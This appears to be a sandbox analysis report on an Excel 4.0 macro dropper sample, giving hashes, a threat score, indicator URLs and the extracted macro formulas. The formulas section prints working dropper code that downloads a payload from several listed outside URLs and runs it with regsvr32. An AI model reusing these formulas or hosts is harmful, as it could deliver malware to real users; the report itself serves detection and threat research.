8beb5f1d0d7939185843aa7c01c802851028503b091ff1c842b59b74bb3e2d83

General

Target

8beb5f1d0d7939185843aa7c01c802851028503b091ff1c842b59b74bb3e2d83
Size

40KB
Sample

241120-vr4knszmgv
MD5

2e8f48907281ba08349690a1ed2150a4
SHA1

d56dcab972ff2b12d48f13fe5f226d7cb5bf94f9
SHA256

8beb5f1d0d7939185843aa7c01c802851028503b091ff1c842b59b74bb3e2d83
SHA512

f8d4775b6338bf38eac0be5f369a2a8a283ff6dd9e643babd1b52aca0cfaef1fe03b73eadd876ce318deddbd38c459ab986e2c80704bdba0b379401067afb1d3
SSDEEP

768:hqhdomi1DOevZCwtumwyKfcrND59V+L9Rw4eWrXcTqZ0Vf5XJ:Edom4DJwylND59V4jwmXc2CVf5Z

Score

10^/10

discovery macro xlm

Rule

Excel 4.0 XLM Macro

C2

https://nuwayinternational.com/js/ELNnL0in5CbGnHmNc/

http://crm.techopesolutions.com/tttwxore/ihzbh04dT0XaJGAf/

http://techplanbd.xyz/qel424/RSz4/

http://steelcorp-fr.com/wp-content/tmMFW0SOgOjVCO/

https://deine-bewerbung.com/wp-content/TKXpk/

https://livejagat.com/h/L37tCM6ppS/

Attributes

formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://nuwayinternational.com/js/ELNnL0in5CbGnHmNc/","..\cre.ocx",0,0) =IF('EFALGV'!D10<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://crm.techopesolutions.com/tttwxore/ihzbh04dT0XaJGAf/","..\cre.ocx",0,0)) =IF('EFALGV'!D12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://techplanbd.xyz/qel424/RSz4/","..\cre.ocx",0,0)) =IF('EFALGV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://steelcorp-fr.com/wp-content/tmMFW0SOgOjVCO/","..\cre.ocx",0,0)) =IF('EFALGV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://deine-bewerbung.com/wp-content/TKXpk/","..\cre.ocx",0,0)) =IF('EFALGV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://livejagat.com/h/L37tCM6ppS/","..\cre.ocx",0,0)) =IF('EFALGV'!D20<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\cre.ocx") =RETURN()

Language

xlm4.0

Source

URLs

xlm40.dropper

https://nuwayinternational.com/js/ELNnL0in5CbGnHmNc/

xlm40.dropper

http://crm.techopesolutions.com/tttwxore/ihzbh04dT0XaJGAf/

xlm40.dropper

http://techplanbd.xyz/qel424/RSz4/